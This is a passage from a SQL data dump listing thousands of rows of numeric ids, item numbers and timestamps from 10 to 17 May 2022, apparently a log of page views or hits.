01:36:00'),(51273,4566,1,'2022-05-10','2022-05-10 02:48:15'),(51274,80,1,'2022-05-10','2022-05-10 04:19:17'),(51275,80,1,'2022-05-10','2022-05-10 04:20:39'),(51276,467,1,'2022-05-10','2022-05-10 04:51:53'),(51277,4668,1,'2022-05-10','2022-05-10 05:05:16'),(51278,473,1,'2022-05-10','2022-05-10 05:49:50'),(51279,1600,1,'2022-05-10','2022-05-10 06:01:19'),(51280,1586,1,'2022-05-10','2022-05-10 06:08:55'),(51281,1586,1,'2022-05-10','2022-05-10 06:17:17'),(51282,2150,1,'2022-05-10','2022-05-10 06:34:51'),(51283,2297,1,'2022-05-10','2022-05-10 07:19:54'),(51284,2297,1,'2022-05-10','2022-05-10 08:05:50'),(51285,1582,1,'2022-05-10','2022-05-10 08:30:28'),(51286,3030,1,'2022-05-10','2022-05-10 08:32:30'),(51287,91,1,'2022-05-10','2022-05-10 09:31:52'),(51288,1594,1,'2022-05-10','2022-05-10 09:33:13'),(51289,470,1,'2022-05-10','2022-05-10 09:48:10'),(51290,470,1,'2022-05-10','2022-05-10 09:48:13'),(51291,4420,1,'2022-05-10','2022-05-10 09:49:26'),(51292,3030,1,'2022-05-10','2022-05-10 10:06:18'),(51293,3124,1,'2022-05-10','2022-05-10 10:10:16'),(51294,2801,1,'2022-05-10','2022-05-10 10:10:46'),(51295,3127,1,'2022-05-10','2022-05-10 10:11:47'),(51296,3710,1,'2022-05-10','2022-05-10 10:12:34'),(51297,3749,1,'2022-05-10','2022-05-10 10:12:55'),(51298,4341,1,'2022-05-10','2022-05-10 10:13:14'),(51299,1598,1,'2022-05-10','2022-05-10 10:15:16'),(51300,570,1,'2022-05-10','2022-05-10 10:36:41'),(51301,4412,1,'2022-05-10','2022-05-10 10:40:55'),(51302,3102,1,'2022-05-10','2022-05-10 10:54:09'),(51303,4703,1,'2022-05-10','2022-05-10 11:24:43'),(51304,4703,1,'2022-05-10','2022-05-10 11:24:49'),(51305,80,1,'2022-05-10','2022-05-10 11:36:37'),(51306,4404,1,'2022-05-10','2022-05-10 11:40:13'),(51307,3102,1,'2022-05-10','2022-05-10 11:46:04'),(51308,1582,1,'2022-05-10','2022-05-10 12:36:42'),(51309,1724,1,'2022-05-10','2022-05-10 12:54:47'),(51310,3282,1,'2022-05-10','2022-05-10 13:11:40'),(51311,1588,1,'2022-05-10','2022-05-10 13:12:54'),(51312,1588,1,'2022-05-10','2022-05-10 13:14:09'),(51313,76,1,'2022-05-10','2022-05-10 13:14:19'),(51314,1596,1,'2022-05-10','2022-05-10 13:32:08'),(51315,1596,1,'2022-05-10','2022-05-10 13:33:51'),(51316,1612,1,'2022-05-10','2022-05-10 13:49:03'),(51317,3724,1,'2022-05-10','2022-05-10 13:50:31'),(51318,4663,1,'2022-05-10','2022-05-10 14:07:44'),(51319,68,1,'2022-05-10','2022-05-10 14:14:52'),(51320,2609,1,'2022-05-10','2022-05-10 14:14:58'),(51321,106,1,'2022-05-10','2022-05-10 14:38:02'),(51322,1782,1,'2022-05-10','2022-05-10 14:42:45'),(51323,80,1,'2022-05-10','2022-05-10 14:43:17'),(51324,4323,1,'2022-05-10','2022-05-10 14:49:46'),(51325,3691,1,'2022-05-10','2022-05-10 15:09:46'),(51326,3261,1,'2022-05-10','2022-05-10 15:25:32'),(51327,3287,1,'2022-05-10','2022-05-10 15:57:16'),(51328,2809,1,'2022-05-10','2022-05-10 16:30:05'),(51329,72,1,'2022-05-10','2022-05-10 16:43:18'),(51330,3060,1,'2022-05-10','2022-05-10 16:49:34'),(51331,3060,1,'2022-05-10','2022-05-10 16:51:02'),(51332,3030,1,'2022-05-10','2022-05-10 17:20:21'),(51333,3030,1,'2022-05-10','2022-05-10 17:20:43'),(51334,1592,1,'2022-05-10','2022-05-10 17:23:38'),(51335,1582,1,'2022-05-10','2022-05-10 17:33:28'),(51336,3027,1,'2022-05-10','2022-05-10 17:48:23'),(51337,1544,1,'2022-05-10','2022-05-10 17:56:58'),(51338,1544,1,'2022-05-10','2022-05-10 17:56:59'),(51339,1544,1,'2022-05-10','2022-05-10 17:58:41'),(51340,1544,1,'2022-05-10','2022-05-10 17:58:47'),(51341,1598,1,'2022-05-10','2022-05-10 18:20:36'),(51342,4706,1,'2022-05-10','2022-05-10 20:07:08'),(51343,4674,1,'2022-05-10','2022-05-10 20:14:58'),(51344,4674,1,'2022-05-10','2022-05-10 20:15:10'),(51345,87,1,'2022-05-10','2022-05-10 20:19:07'),(51346,4700,1,'2022-05-10','2022-05-10 20:47:15'),(51347,4400,1,'2022-05-10','2022-05-10 20:54:05'),(51348,4412,1,'2022-05-10','2022-05-10 20:58:51'),(51349,1588,1,'2022-05-10','2022-05-10 21:10:35'),(51350,3027,1,'2022-05-10','2022-05-10 21:47:47'),(51351,4654,1,'2022-05-10','2022-05-10 22:06:59'),(51352,4694,1,'2022-05-10','2022-05-10 22:07:04'),(51353,570,1,'2022-05-10','2022-05-10 22:14:22'),(51354,4654,1,'2022-05-10','2022-05-10 22:26:59'),(51355,1600,1,'2022-05-10','2022-05-10 23:15:26'),(51356,4688,1,'2022-05-10','2022-05-10 23:17:02'),(51357,2775,1,'2022-05-10','2022-05-10 23:37:42'),(51358,1724,1,'2022-05-10','2022-05-10 23:49:39'),(51359,1724,1,'2022-05-11','2022-05-11 00:13:37'),(51360,80,1,'2022-05-11','2022-05-11 00:27:10'),(51361,1588,1,'2022-05-11','2022-05-11 00:48:03'),(51362,3724,1,'2022-05-11','2022-05-11 00:59:42'),(51363,68,1,'2022-05-11','2022-05-11 01:10:45'),(51364,4681,1,'2022-05-11','2022-05-11 01:13:57'),(51365,4685,1,'2022-05-11','2022-05-11 01:41:06'),(51366,1877,1,'2022-05-11','2022-05-11 02:14:48'),(51367,1598,1,'2022-05-11','2022-05-11 02:29:49'),(51368,4700,1,'2022-05-11','2022-05-11 02:40:46'),(51369,1600,1,'2022-05-11','2022-05-11 02:45:17'),(51370,4677,1,'2022-05-11','2022-05-11 02:57:56'),(51371,1600,1,'2022-05-11','2022-05-11 03:00:10'),(51372,3752,1,'2022-05-11','2022-05-11 03:29:45'),(51373,3482,1,'2022-05-11','2022-05-11 04:04:37'),(51374,3107,1,'2022-05-11','2022-05-11 04:11:00'),(51375,4524,1,'2022-05-11','2022-05-11 05:30:23'),(51376,2411,1,'2022-05-11','2022-05-11 05:40:48'),(51377,1770,1,'2022-05-11','2022-05-11 06:30:27'),(51378,1596,1,'2022-05-11','2022-05-11 07:43:16'),(51379,1544,1,'2022-05-11','2022-05-11 07:56:39'),(51380,3261,1,'2022-05-11','2022-05-11 07:56:41'),(51381,467,1,'2022-05-11','2022-05-11 09:26:43'),(51382,1766,1,'2022-05-11','2022-05-11 10:27:33'),(51383,68,1,'2022-05-11','2022-05-11 10:45:53'),(51384,2775,1,'2022-05-11','2022-05-11 10:46:06'),(51385,4444,1,'2022-05-11','2022-05-11 12:15:57'),(51386,3706,1,'2022-05-11','2022-05-11 12:16:31'),(51387,3072,1,'2022-05-11','2022-05-11 12:20:26'),(51388,3479,1,'2022-05-11','2022-05-11 12:38:24'),(51389,1612,1,'2022-05-11','2022-05-11 12:46:19'),(51390,68,1,'2022-05-11','2022-05-11 13:01:45'),(51391,1600,1,'2022-05-11','2022-05-11 13:02:56'),(51392,3764,1,'2022-05-11','2022-05-11 13:05:54'),(51393,4520,1,'2022-05-11','2022-05-11 13:16:19'),(51394,1600,1,'2022-05-11','2022-05-11 13:39:25'),(51395,2457,1,'2022-05-11','2022-05-11 13:42:45'),(51396,84,1,'2022-05-11','2022-05-11 13:43:25'),(51397,3479,1,'2022-05-11','2022-05-11 13:45:52'),(51398,2457,1,'2022-05-11','2022-05-11 13:46:07'),(51399,68,1,'2022-05-11','2022-05-11 13:46:27'),(51400,2775,1,'2022-05-11','2022-05-11 13:48:29'),(51401,1592,1,'2022-05-11','2022-05-11 14:18:26'),(51402,80,1,'2022-05-11','2022-05-11 14:21:43'),(51403,1582,1,'2022-05-11','2022-05-11 14:25:04'),(51404,91,1,'2022-05-11','2022-05-11 14:36:00'),(51405,4520,1,'2022-05-11','2022-05-11 14:40:00'),(51406,89,1,'2022-05-11','2022-05-11 14:40:08'),(51407,1582,1,'2022-05-11','2022-05-11 14:41:34'),(51408,91,1,'2022-05-11','2022-05-11 14:42:28'),(51409,84,1,'2022-05-11','2022-05-11 14:51:17'),(51410,1604,1,'2022-05-11','2022-05-11 14:57:30'),(51411,89,1,'2022-05-11','2022-05-11 14:58:11'),(51412,1608,1,'2022-05-11','2022-05-11 14:58:44'),(51413,3691,1,'2022-05-11','2022-05-11 15:10:06'),(51414,4582,1,'2022-05-11','2022-05-11 15:34:11'),(51415,570,1,'2022-05-11','2022-05-11 15:43:13'),(51416,4524,1,'2022-05-11','2022-05-11 16:01:02'),(51417,1596,1,'2022-05-11','2022-05-11 17:09:15'),(51418,1596,1,'2022-05-11','2022-05-11 17:09:50'),(51419,1596,1,'2022-05-11','2022-05-11 17:10:36'),(51420,1772,1,'2022-05-11','2022-05-11 17:23:09'),(51421,1600,1,'2022-05-11','2022-05-11 17:30:04'),(51422,1600,1,'2022-05-11','2022-05-11 17:31:22'),(51423,2704,1,'2022-05-11','2022-05-11 18:54:56'),(51424,4416,1,'2022-05-11','2022-05-11 19:21:47'),(51425,482,1,'2022-05-11','2022-05-11 19:51:01'),(51426,3072,1,'2022-05-11','2022-05-11 21:29:29'),(51427,4457,1,'2022-05-11','2022-05-11 21:47:15'),(51428,3664,1,'2022-05-11','2022-05-11 22:14:31'),(51429,1594,1,'2022-05-11','2022-05-11 22:37:56'),(51430,3313,1,'2022-05-11','2022-05-11 23:15:00'),(51431,2993,1,'2022-05-11','2022-05-11 23:45:30'),(51432,4363,1,'2022-05-11','2022-05-11 23:53:24'),(51433,3489,1,'2022-05-12','2022-05-12 00:39:07'),(51434,4238,1,'2022-05-12','2022-05-12 01:21:01'),(51435,4329,1,'2022-05-12','2022-05-12 03:16:15'),(51436,2751,1,'2022-05-12','2022-05-12 04:00:54'),(51437,3055,1,'2022-05-12','2022-05-12 04:13:54'),(51438,1600,1,'2022-05-12','2022-05-12 04:20:18'),(51439,335,1,'2022-05-12','2022-05-12 04:26:38'),(51440,4681,1,'2022-05-12','2022-05-12 04:39:26'),(51441,1598,1,'2022-05-12','2022-05-12 05:16:49'),(51442,1720,1,'2022-05-12','2022-05-12 05:16:57'),(51443,4524,1,'2022-05-12','2022-05-12 05:29:53'),(51444,1598,1,'2022-05-12','2022-05-12 05:34:36'),(51445,2751,1,'2022-05-12','2022-05-12 05:36:47'),(51446,1600,1,'2022-05-12','2022-05-12 05:43:42'),(51447,1720,1,'2022-05-12','2022-05-12 05:56:45'),(51448,87,1,'2022-05-12','2022-05-12 05:59:22'),(51449,4654,1,'2022-05-12','2022-05-12 06:09:25'),(51450,1877,1,'2022-05-12','2022-05-12 06:22:17'),(51451,4660,1,'2022-05-12','2022-05-12 06:35:17'),(51452,1602,1,'2022-05-12','2022-05-12 07:17:20'),(51453,68,1,'2022-05-12','2022-05-12 08:40:24'),(51454,3072,1,'2022-05-12','2022-05-12 09:29:35'),(51455,4457,1,'2022-05-12','2022-05-12 09:34:48'),(51456,4457,1,'2022-05-12','2022-05-12 09:51:38'),(51457,1582,1,'2022-05-12','2022-05-12 10:24:32'),(51458,91,1,'2022-05-12','2022-05-12 12:09:44'),(51459,4357,1,'2022-05-12','2022-05-12 12:12:56'),(51460,91,1,'2022-05-12','2022-05-12 12:13:17'),(51461,4238,1,'2022-05-12','2022-05-12 12:14:27'),(51462,91,1,'2022-05-12','2022-05-12 12:14:40'),(51463,84,1,'2022-05-12','2022-05-12 12:45:57'),(51464,1872,1,'2022-05-12','2022-05-12 13:22:57'),(51465,84,1,'2022-05-12','2022-05-12 13:33:25'),(51466,3038,1,'2022-05-12','2022-05-12 14:02:14'),(51467,3313,1,'2022-05-12','2022-05-12 14:23:50'),(51468,1610,1,'2022-05-12','2022-05-12 14:46:35'),(51469,1544,1,'2022-05-12','2022-05-12 15:16:47'),(51470,1600,1,'2022-05-12','2022-05-12 15:32:11'),(51471,80,1,'2022-05-12','2022-05-12 15:32:44'),(51472,4344,1,'2022-05-12','2022-05-12 16:17:25'),(51473,1602,1,'2022-05-12','2022-05-12 16:37:21'),(51474,91,1,'2022-05-12','2022-05-12 16:38:10'),(51475,1602,1,'2022-05-12','2022-05-12 16:39:51'),(51476,1602,1,'2022-05-12','2022-05-12 16:40:15'),(51477,1598,1,'2022-05-12','2022-05-12 17:19:27'),(51478,4681,1,'2022-05-12','2022-05-12 17:20:06'),(51479,3083,1,'2022-05-12','2022-05-12 17:59:18'),(51480,4654,1,'2022-05-12','2022-05-12 18:01:22'),(51481,2309,1,'2022-05-12','2022-05-12 18:26:25'),(51482,68,1,'2022-05-12','2022-05-12 18:59:40'),(51483,1544,1,'2022-05-12','2022-05-12 19:38:04'),(51484,1544,1,'2022-05-12','2022-05-12 19:38:07'),(51485,1544,1,'2022-05-12','2022-05-12 19:38:09'),(51486,1544,1,'2022-05-12','2022-05-12 19:38:25'),(51487,1544,1,'2022-05-12','2022-05-12 19:46:06'),(51488,1602,1,'2022-05-12','2022-05-12 21:15:23'),(51489,4622,1,'2022-05-12','2022-05-12 21:50:40'),(51490,4674,1,'2022-05-12','2022-05-12 22:09:57'),(51491,1596,1,'2022-05-12','2022-05-12 22:18:40'),(51492,1596,1,'2022-05-12','2022-05-12 22:18:44'),(51493,4685,1,'2022-05-12','2022-05-12 22:29:12'),(51494,4344,1,'2022-05-12','2022-05-12 23:01:27'),(51495,1614,1,'2022-05-12','2022-05-12 23:01:46'),(51496,4517,1,'2022-05-12','2022-05-12 23:20:40'),(51497,4566,1,'2022-05-12','2022-05-12 23:33:30'),(51498,4344,1,'2022-05-13','2022-05-13 00:01:42'),(51499,4520,1,'2022-05-13','2022-05-13 00:31:25'),(51500,4520,1,'2022-05-13','2022-05-13 01:01:21'),(51501,4697,1,'2022-05-13','2022-05-13 01:19:28'),(51502,4238,1,'2022-05-13','2022-05-13 02:24:47'),(51503,3229,1,'2022-05-13','2022-05-13 04:02:47'),(51504,4697,1,'2022-05-13','2022-05-13 06:22:32'),(51505,2751,1,'2022-05-13','2022-05-13 07:32:03'),(51506,1598,1,'2022-05-13','2022-05-13 07:36:02'),(51507,80,1,'2022-05-13','2022-05-13 07:36:14'),(51508,4408,1,'2022-05-13','2022-05-13 08:25:19'),(51509,1741,1,'2022-05-13','2022-05-13 08:31:28'),(51510,1596,1,'2022-05-13','2022-05-13 09:42:02'),(51511,1596,1,'2022-05-13','2022-05-13 10:00:39'),(51512,4677,1,'2022-05-13','2022-05-13 10:25:03'),(51513,1596,1,'2022-05-13','2022-05-13 10:34:11'),(51514,1596,1,'2022-05-13','2022-05-13 10:45:33'),(51515,4408,1,'2022-05-13','2022-05-13 10:52:16'),(51516,2769,1,'2022-05-13','2022-05-13 10:54:52'),(51517,1602,1,'2022-05-13','2022-05-13 11:11:56'),(51518,2558,1,'2022-05-13','2022-05-13 11:38:03'),(51519,68,1,'2022-05-13','2022-05-13 11:54:05'),(51520,2704,1,'2022-05-13','2022-05-13 12:28:30'),(51521,1588,1,'2022-05-13','2022-05-13 12:32:20'),(51522,4520,1,'2022-05-13','2022-05-13 12:39:04'),(51523,4694,1,'2022-05-13','2022-05-13 12:42:29'),(51524,80,1,'2022-05-13','2022-05-13 14:15:20'),(51525,4457,1,'2022-05-13','2022-05-13 14:36:05'),(51526,1586,1,'2022-05-13','2022-05-13 14:51:20'),(51527,3714,1,'2022-05-13','2022-05-13 15:02:13'),(51528,1582,1,'2022-05-13','2022-05-13 15:17:51'),(51529,2152,1,'2022-05-13','2022-05-13 15:24:18'),(51530,2152,1,'2022-05-13','2022-05-13 15:24:25'),(51531,2152,1,'2022-05-13','2022-05-13 15:24:37'),(51532,2152,1,'2022-05-13','2022-05-13 15:24:49'),(51533,4377,1,'2022-05-13','2022-05-13 16:02:26'),(51534,1584,1,'2022-05-13','2022-05-13 16:41:39'),(51535,3706,1,'2022-05-13','2022-05-13 16:50:30'),(51536,1877,1,'2022-05-13','2022-05-13 17:07:51'),(51537,4660,1,'2022-05-13','2022-05-13 17:27:05'),(51538,3109,1,'2022-05-13','2022-05-13 18:01:41'),(51539,108,1,'2022-05-13','2022-05-13 18:11:46'),(51540,2804,1,'2022-05-13','2022-05-13 19:51:16'),(51541,4408,1,'2022-05-13','2022-05-13 22:08:34'),(51542,2993,1,'2022-05-14','2022-05-14 00:13:24'),(51543,3727,1,'2022-05-14','2022-05-14 00:47:24'),(51544,482,1,'2022-05-14','2022-05-14 01:40:18'),(51545,1726,1,'2022-05-14','2022-05-14 01:41:23'),(51546,4404,1,'2022-05-14','2022-05-14 01:42:33'),(51547,68,1,'2022-05-14','2022-05-14 02:48:34'),(51548,487,1,'2022-05-14','2022-05-14 02:56:03'),(51549,68,1,'2022-05-14','2022-05-14 02:57:44'),(51550,3066,1,'2022-05-14','2022-05-14 04:07:24'),(51551,2804,1,'2022-05-14','2022-05-14 04:38:30'),(51552,3764,1,'2022-05-14','2022-05-14 04:44:04'),(51553,4551,1,'2022-05-14','2022-05-14 05:40:10'),(51554,4642,1,'2022-05-14','2022-05-14 05:49:46'),(51555,1709,1,'2022-05-14','2022-05-14 06:06:13'),(51556,1703,1,'2022-05-14','2022-05-14 06:10:37'),(51557,4420,1,'2022-05-14','2022-05-14 06:38:16'),(51558,1741,1,'2022-05-14','2022-05-14 06:48:54'),(51559,1606,1,'2022-05-14','2022-05-14 07:22:42'),(51560,1699,1,'2022-05-14','2022-05-14 07:43:07'),(51561,1766,1,'2022-05-14','2022-05-14 09:37:32'),(51562,4420,1,'2022-05-14','2022-05-14 10:22:29'),(51563,3731,1,'2022-05-14','2022-05-14 10:32:13'),(51564,3691,1,'2022-05-14','2022-05-14 10:36:19'),(51565,2156,1,'2022-05-14','2022-05-14 11:07:28'),(51566,4373,1,'2022-05-14','2022-05-14 12:26:54'),(51567,3479,1,'2022-05-14','2022-05-14 12:39:06'),(51568,3083,1,'2022-05-14','2022-05-14 14:24:10'),(51569,3004,1,'2022-05-14','2022-05-14 17:07:57'),(51570,4542,1,'2022-05-14','2022-05-14 17:20:24'),(51571,4542,1,'2022-05-14','2022-05-14 18:37:29'),(51572,1612,1,'2022-05-14','2022-05-14 19:00:27'),(51573,3004,1,'2022-05-14','2022-05-14 19:00:48'),(51574,4587,1,'2022-05-14','2022-05-14 19:52:37'),(51575,3117,1,'2022-05-14','2022-05-14 19:52:47'),(51576,4660,1,'2022-05-14','2022-05-14 20:22:27'),(51577,4457,1,'2022-05-14','2022-05-14 20:51:12'),(51578,1703,1,'2022-05-14','2022-05-14 21:47:00'),(51579,3267,1,'2022-05-14','2022-05-14 22:07:27'),(51580,4420,1,'2022-05-14','2022-05-14 22:52:10'),(51581,1877,1,'2022-05-14','2022-05-14 22:52:27'),(51582,1614,1,'2022-05-14','2022-05-14 23:06:21'),(51583,3673,1,'2022-05-15','2022-05-15 00:07:26'),(51584,3307,1,'2022-05-15','2022-05-15 00:22:36'),(51585,3267,1,'2022-05-15','2022-05-15 00:52:28'),(51586,1600,1,'2022-05-15','2022-05-15 01:07:37'),(51587,2813,1,'2022-05-15','2022-05-15 01:11:48'),(51588,3069,1,'2022-05-15','2022-05-15 01:22:26'),(51589,1612,1,'2022-05-15','2022-05-15 01:34:38'),(51590,2813,1,'2022-05-15','2022-05-15 01:56:26'),(51591,3253,1,'2022-05-15','2022-05-15 02:18:45'),(51592,2751,1,'2022-05-15','2022-05-15 02:31:27'),(51593,3006,1,'2022-05-15','2022-05-15 03:26:18'),(51594,1766,1,'2022-05-15','2022-05-15 03:43:28'),(51595,3253,1,'2022-05-15','2022-05-15 05:33:15'),(51596,3226,1,'2022-05-15','2022-05-15 06:13:29'),(51597,1608,1,'2022-05-15','2022-05-15 07:05:41'),(51598,87,1,'2022-05-15','2022-05-15 07:14:58'),(51599,4706,1,'2022-05-15','2022-05-15 09:13:55'),(51600,4706,1,'2022-05-15','2022-05-15 09:15:18'),(51601,1728,1,'2022-05-15','2022-05-15 09:30:05'),(51602,1728,1,'2022-05-15','2022-05-15 09:30:46'),(51603,1728,1,'2022-05-15','2022-05-15 09:31:10'),(51604,91,1,'2022-05-15','2022-05-15 09:32:40'),(51605,1728,1,'2022-05-15','2022-05-15 09:33:36'),(51606,1604,1,'2022-05-15','2022-05-15 09:54:45'),(51607,1699,1,'2022-05-15','2022-05-15 10:01:12'),(51608,4691,1,'2022-05-15','2022-05-15 10:08:15'),(51609,2775,1,'2022-05-15','2022-05-15 10:16:19'),(51610,2751,1,'2022-05-15','2022-05-15 10:40:17'),(51611,4448,1,'2022-05-15','2022-05-15 11:24:43'),(51612,4654,1,'2022-05-15','2022-05-15 11:59:04'),(51613,4691,1,'2022-05-15','2022-05-15 12:29:42'),(51614,2457,1,'2022-05-15','2022-05-15 12:45:38'),(51615,1586,1,'2022-05-15','2022-05-15 13:01:03'),(51616,2609,1,'2022-05-15','2022-05-15 13:49:12'),(51617,2904,1,'2022-05-15','2022-05-15 13:54:41'),(51618,80,1,'2022-05-15','2022-05-15 14:29:20'),(51619,3092,1,'2022-05-15','2022-05-15 14:39:41'),(51620,3092,1,'2022-05-15','2022-05-15 14:49:35'),(51621,2769,1,'2022-05-15','2022-05-15 15:04:08'),(51622,91,1,'2022-05-15','2022-05-15 15:12:36'),(51623,2769,1,'2022-05-15','2022-05-15 15:14:59'),(51624,570,1,'2022-05-15','2022-05-15 15:16:02'),(51625,570,1,'2022-05-15','2022-05-15 15:16:17'),(51626,570,1,'2022-05-15','2022-05-15 15:16:35'),(51627,4373,1,'2022-05-15','2022-05-15 15:22:00'),(51628,3253,1,'2022-05-15','2022-05-15 15:27:14'),(51629,4323,1,'2022-05-15','2022-05-15 16:01:35'),(51630,4520,1,'2022-05-15','2022-05-15 16:24:01'),(51631,2769,1,'2022-05-15','2022-05-15 16:37:26'),(51632,2395,1,'2022-05-15','2022-05-15 16:55:27'),(51633,76,1,'2022-05-15','2022-05-15 17:18:10'),(51634,3774,1,'2022-05-15','2022-05-15 17:31:26'),(51635,3774,1,'2022-05-15','2022-05-15 18:07:30'),(51636,4301,1,'2022-05-15','2022-05-15 18:21:31'),(51637,3280,1,'2022-05-15','2022-05-15 18:35:32'),(51638,3004,1,'2022-05-15','2022-05-15 18:39:44'),(51639,1604,1,'2022-05-15','2022-05-15 18:49:34'),(51640,2769,1,'2022-05-15','2022-05-15 19:05:14'),(51641,89,1,'2022-05-15','2022-05-15 19:31:33'),(51642,4561,1,'2022-05-15','2022-05-15 19:45:52'),(51643,4561,1,'2022-05-15','2022-05-15 19:59:34'),(51644,89,1,'2022-05-15','2022-05-15 20:13:30'),(51645,4448,1,'2022-05-15','2022-05-15 20:28:36'),(51646,4587,1,'2022-05-15','2022-05-15 21:09:58'),(51647,4520,1,'2022-05-15','2022-05-15 21:38:41'),(51648,1586,1,'2022-05-15','2022-05-15 21:45:55'),(51649,3752,1,'2022-05-15','2022-05-15 22:00:15'),(51650,3706,1,'2022-05-15','2022-05-15 22:04:59'),(51651,1604,1,'2022-05-15','2022-05-15 22:07:31'),(51652,4697,1,'2022-05-15','2022-05-15 22:14:38'),(51653,4576,1,'2022-05-15','2022-05-15 22:43:24'),(51654,1582,1,'2022-05-15','2022-05-15 22:50:35'),(51655,76,1,'2022-05-15','2022-05-15 23:16:33'),(51656,76,1,'2022-05-16','2022-05-16 00:08:15'),(51657,2911,1,'2022-05-16','2022-05-16 00:12:25'),(51658,1602,1,'2022-05-16','2022-05-16 00:14:43'),(51659,76,1,'2022-05-16','2022-05-16 00:15:46'),(51660,1602,1,'2022-05-16','2022-05-16 00:15:55'),(51661,4520,1,'2022-05-16','2022-05-16 00:16:53'),(51662,1877,1,'2022-05-16','2022-05-16 00:25:30'),(51663,76,1,'2022-05-16','2022-05-16 00:33:15'),(51664,4301,1,'2022-05-16','2022-05-16 00:40:14'),(51665,2769,1,'2022-05-16','2022-05-16 00:56:51'),(51666,4529,1,'2022-05-16','2022-05-16 01:08:20'),(51667,4517,1,'2022-05-16','2022-05-16 01:19:15'),(51668,1600,1,'2022-05-16','2022-05-16 01:41:38'),(51669,3746,1,'2022-05-16','2022-05-16 01:52:58'),(51670,482,1,'2022-05-16','2022-05-16 02:11:21'),(51671,1606,1,'2022-05-16','2022-05-16 02:39:34'),(51672,1604,1,'2022-05-16','2022-05-16 02:49:16'),(51673,3727,1,'2022-05-16','2022-05-16 03:05:59'),(51674,2964,1,'2022-05-16','2022-05-16 04:08:17'),(51675,3727,1,'2022-05-16','2022-05-16 04:30:23'),(51676,4622,1,'2022-05-16','2022-05-16 05:23:00'),(51677,1600,1,'2022-05-16','2022-05-16 05:57:22'),(51678,4341,1,'2022-05-16','2022-05-16 08:00:39'),(51679,3710,1,'2022-05-16','2022-05-16 08:02:14'),(51680,3127,1,'2022-05-16','2022-05-16 08:02:56'),(51681,3124,1,'2022-05-16','2022-05-16 08:03:47'),(51682,1582,1,'2022-05-16','2022-05-16 09:08:47'),(51683,108,1,'2022-05-16','2022-05-16 09:36:16'),(51684,4517,1,'2022-05-16','2022-05-16 09:42:55'),(51685,1600,1,'2022-05-16','2022-05-16 10:06:44'),(51686,4514,1,'2022-05-16','2022-05-16 10:11:33'),(51687,1586,1,'2022-05-16','2022-05-16 10:21:00'),(51688,3764,1,'2022-05-16','2022-05-16 10:21:51'),(51689,1582,1,'2022-05-16','2022-05-16 10:35:17'),(51690,4520,1,'2022-05-16','2022-05-16 10:41:08'),(51691,4569,1,'2022-05-16','2022-05-16 11:03:45'),(51692,2309,1,'2022-05-16','2022-05-16 11:32:18'),(51693,1544,1,'2022-05-16','2022-05-16 11:33:21'),(51694,2704,1,'2022-05-16','2022-05-16 11:46:43'),(51695,1602,1,'2022-05-16','2022-05-16 11:59:38'),(51696,4457,1,'2022-05-16','2022-05-16 12:06:24'),(51697,2309,1,'2022-05-16','2022-05-16 12:19:04'),(51698,3097,1,'2022-05-16','2022-05-16 12:22:48'),(51699,3781,1,'2022-05-16','2022-05-16 12:25:01'),(51700,2309,1,'2022-05-16','2022-05-16 12:29:55'),(51701,1582,1,'2022-05-16','2022-05-16 12:36:27'),(51702,72,1,'2022-05-16','2022-05-16 12:40:23'),(51703,1600,1,'2022-05-16','2022-05-16 12:40:49'),(51704,91,1,'2022-05-16','2022-05-16 12:42:52'),(51705,72,1,'2022-05-16','2022-05-16 12:50:37'),(51706,72,1,'2022-05-16','2022-05-16 12:51:09'),(51707,68,1,'2022-05-16','2022-05-16 12:51:24'),(51708,84,1,'2022-05-16','2022-05-16 12:51:38'),(51709,2609,1,'2022-05-16','2022-05-16 12:51:56'),(51710,68,1,'2022-05-16','2022-05-16 12:52:07'),(51711,1586,1,'2022-05-16','2022-05-16 13:01:48'),(51712,4529,1,'2022-05-16','2022-05-16 13:13:14'),(51713,1544,1,'2022-05-16','2022-05-16 13:28:29'),(51714,4520,1,'2022-05-16','2022-05-16 13:35:11'),(51715,2609,1,'2022-05-16','2022-05-16 13:45:57'),(51716,1598,1,'2022-05-16','2022-05-16 13:50:09'),(51717,1602,1,'2022-05-16','2022-05-16 13:56:36'),(51718,80,1,'2022-05-16','2022-05-16 14:02:25'),(51719,1602,1,'2022-05-16','2022-05-16 14:07:18'),(51720,2309,1,'2022-05-16','2022-05-16 14:13:58'),(51721,2309,1,'2022-05-16','2022-05-16 14:14:10'),(51722,2309,1,'2022-05-16','2022-05-16 14:14:22'),(51723,1594,1,'2022-05-16','2022-05-16 14:14:25'),(51724,2309,1,'2022-05-16','2022-05-16 14:15:02'),(51725,2704,1,'2022-05-16','2022-05-16 14:18:18'),(51726,1711,1,'2022-05-16','2022-05-16 14:37:46'),(51727,4648,1,'2022-05-16','2022-05-16 14:39:56'),(51728,4651,1,'2022-05-16','2022-05-16 14:50:39'),(51729,1544,1,'2022-05-16','2022-05-16 14:58:40'),(51730,108,1,'2022-05-16','2022-05-16 15:15:38'),(51731,1600,1,'2022-05-16','2022-05-16 15:55:09'),(51732,467,1,'2022-05-16','2022-05-16 16:28:42'),(51733,1596,1,'2022-05-16','2022-05-16 17:47:56'),(51734,1711,1,'2022-05-16','2022-05-16 18:25:29'),(51735,4608,1,'2022-05-16','2022-05-16 18:40:54'),(51736,1582,1,'2022-05-16','2022-05-16 19:13:08'),(51737,1544,1,'2022-05-16','2022-05-16 19:30:47'),(51738,2309,1,'2022-05-16','2022-05-16 20:33:31'),(51739,2769,1,'2022-05-16','2022-05-16 20:50:36'),(51740,1602,1,'2022-05-16','2022-05-16 21:20:37'),(51741,4660,1,'2022-05-16','2022-05-16 21:51:22'),(51742,3781,1,'2022-05-16','2022-05-16 22:11:21'),(51743,4520,1,'2022-05-16','2022-05-16 22:20:37'),(51744,1582,1,'2022-05-16','2022-05-16 22:56:29'),(51745,1774,1,'2022-05-16','2022-05-16 23:20:01'),(51746,3498,1,'2022-05-16','2022-05-16 23:31:44'),(51747,2457,1,'2022-05-16','2022-05-16 23:49:23'),(51748,1582,1,'2022-05-16','2022-05-16 23:55:15'),(51749,4520,1,'2022-05-17','2022-05-17 00:06:58'),(51750,4520,1,'2022-05-17','2022-05-17 00:13:17'),(51751,3243,1,'2022-05-17','2022-05-17 00:21:40'),(51752,2309,1,'2022-05-17','2022-05-17 00:24:36'),(51753,3498,1,'2022-05-17','2022-05-17 00:30:28'),(51754,4651,1,'2022-05-17','2022-05-17 00:36:21'),(51755,4648,1,'2022-05-17','2022-05-17 00:42:13'),(51756,4338,1,'2022-05-17','2022-05-17 00:53:57'),(51757,1600,1,'2022-05-17','2022-05-17 00:59:51'),(51758,4651,1,'2022-05-17','2022-05-17 